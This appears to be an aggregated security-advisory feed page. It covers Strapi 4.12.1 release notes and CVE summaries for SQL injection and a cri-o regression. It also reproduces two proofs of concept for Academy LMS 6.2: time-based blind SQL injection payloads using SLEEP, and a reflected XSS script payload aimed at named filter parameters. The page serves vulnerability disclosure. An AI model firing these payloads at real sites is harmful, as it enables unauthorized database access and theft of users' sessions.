Strapi is the an open-source headless content management system. Prior to version 4.12.1, field level permissions are not respected in the relationship title. If an actor has relationship title and the relationship shows a field they don't have permission to see, the field will still be visible. Version 4.12.1 has a fix for this issue.

**⚠️ Security Warning and Notice ⚠️**

Strapi was made aware of a few vulnerabilities that were patched in this release, for now we are going to delay the detailed disclosure of the exact details on how to exploit it and how it was patched to give time for users to upgrade before we do public disclosure.

For now the delay timeline looks like we will release the detailed information in the next four (4) weeks, we expect to do public disclosure (via a blog post) on Wednesday Aug 30th, 2023.

**⚙️ Chore**

*   \[core:admin\] Chore: Drop getRequestUrl from the admin app (#17439) @gu-stav
*   \[core:admin\] Chore: Move marketplace and plugins hooks into their page contexts (#17533) @gu-stav
*   \[core:content-manager\] Chore: Inline fetch functions and drop getRequestUrl from content-manager (#17437) @gu-stav
*   \[core:content-manager\] Chore: Drop lodash from configure the view page (#17438) @gu-stav
*   \[core:content-manager\] Chore: Cleanup configure the view styles (#17440) @gu-stav
*   \[core:strapi\] Drop Node 14 support, add Node 20 (#16557) @innerdvations
*   \[dependencies\] chore(deps): bump winston from 3.9.0 to 3.10.0 (#17268) @dependabot
*   \[dependencies\] Update semver to remove audit warnings (#17449) @derrickmehaffy
*   \[dependencies\] chore(deps-dev): bump the eslint group with 3 updates (#17507) @dependabot
*   \[dependencies\] chore(deps-dev): bump core-js from 3.31.0 to 3.32.0 (#17508) @dependabot
*   \[docs\] Fix some spelling and standardiZe regional usages (#17491) @innerdvations
*   \[tooling\] tests(e2e): init playwright, add small test suite & cli (#14807) @alexandrebodin

**💅 Enhancement**

*   \[core:content-manager\] Add case insensitive filters to content manager (#16960) @marob
*   \[core:content-manager\] Feat: Add creator fields as filter options (#17043) @Feranchz
*   \[core:data-transfer\] \[DTS\] Add detail to ws upgrade error (#17452) @innerdvations
*   \[core:utils\] Wildcard populate performance optimizations (#16507) @Convly
*   \[generators:app\] fix: Update env.example (#16570) @xiaotiandada

**🔥 Bug fix**

*   \[core:admin\] Fix: Registration - Send null for lastname instead of empty string (#17462) @gu-stav
*   \[core:data-transfer\] Fix data transfer relations (#17475) @christiancp100
*   \[core:review-workflows\] fix: reorder rw permissions so they appear as CRUD (#17493) @Marc-Roig
*   \[core:review-workflows\] fix: Content API partial update fails when not populating stage field (#17512) @Marc-Roig
*   \[core:upload\] fixed: Media Library - Can\`t delete empty folder #17263 (#17280) @noobCode-69
*   \[core:upload\] Update media thumbnails on replace (#17455) @jhoward1994
*   \[core:upload\] Fix: Upload assets from url (#17459) @Feranchz
*   \[tooling\] Fix intermittently failing API tests by using consistent versions of sqlite packages (#17490) @innerdvations

**📚 Update and Migration Guides**

*   General update guide can be found here
*   Migration guides can be found here 📚

CVE-2023-37263: Release v4.12.1 · strapi/strapi

A vulnerability, which was classified as critical, has been found in infinitietech taskhub 2.8.7. Affected by this issue is some unknown functionality of the file /home/get_tasks_list of the component GET Parameter Handler. The manipulation of the argument project/status/user_id/sort/search leads to sql injection. VDB-239798 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-4987

The version of cri-o as released for Red Hat OpenShift Container Platform 4.9.48, 4.10.31, and 4.11.6 via RHBA-2022:6316, RHBA-2022:6257, and RHBA-2022:6658, respectively, included an incorrect version of cri-o missing the fix for CVE-2022-27652, which was previously fixed in OCP 4.9.41 and 4.10.12 via RHBA-2022:5433 and RHSA-2022:1600. This issue could allow an attacker with access to programs with inheritable file capabilities to elevate those capabilities to the permitted set when execve(2) runs. For more details, see https://access.redhat.com/security/cve/CVE-2022-27652.

CVE-2022-3466

Academy LMS version 6.2 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Academy LMS 6.2 - SQL Injection# Exploit Author: CraCkEr# Date: 29/08/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/academy/# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4974# CWE: CWE-89 / CWE-74 / CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /academy/tutor/filterGET parameter 'price_min' is vulnerable to SQL InjectionGET parameter 'price_max' is vulnerable to SQL Injectionhttps://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0---Parameter: price_min (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0Parameter: price_max (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0---[-] Done

Academy LMS 6.2 SQL Injection

Academy LMS version 6.2 suffers from a cross site scripting vulnerability.

    # Exploit Title: Academy LMS 6.2 - Reflected XSS# Exploit Author: CraCkEr# Date: 29/08/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/academy/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4973# CWE: CWE-79 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /academy/tutor/filterGET parameter 'searched_word' is vulnerable to XSSGET parameter 'searched_tution_class_type[]' is vulnerable to XSSGET parameter 'searched_price_type[]' is vulnerable to XSSGET parameter 'searched_duration[]' is vulnerable to XSShttps://website/academy/tutor/filter?searched_word=[XSS]&searched_tution_class_type%5B%5D=[XSS]&price_min=1&price_max=9&searched_price_type%5B%5D=[XSS]&searched_duration%5B%5D=[XSS]XSS Payload:acoa5"><script>alert(1)</script>dyzs0[-] Done

Academy LMS 6.2 Cross Site Scripting

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Besttem Network Marketing Software allows SQL Injection.This issue affects Network Marketing Software: before 1.0.2309.6.



CVE-2023-4833

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cevik Informatics Online Payment System allows SQL Injection.This issue affects Online Payment System: before 4.09.



CVE-2023-4231

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Innosa Probbys allows SQL Injection.This issue affects Probbys: before 2.



CVE-2023-4670

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ncode Ncep allows SQL Injection.This issue affects Ncep: before 20230914 .



CVE-2023-4831

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Sanalogy Turasistan allows SQL Injection.This issue affects Turasistan: before 20230911 .



Tag

#sql